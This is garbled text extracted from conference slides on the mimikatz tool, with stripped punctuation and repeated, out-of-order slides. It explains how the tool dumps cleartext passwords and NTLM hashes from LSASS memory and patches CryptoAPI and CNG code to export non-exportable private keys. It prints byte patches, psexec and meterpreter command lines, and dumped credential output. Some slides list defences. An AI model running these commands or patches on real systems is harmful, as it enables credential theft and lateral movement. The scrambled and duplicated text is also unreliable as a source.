ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
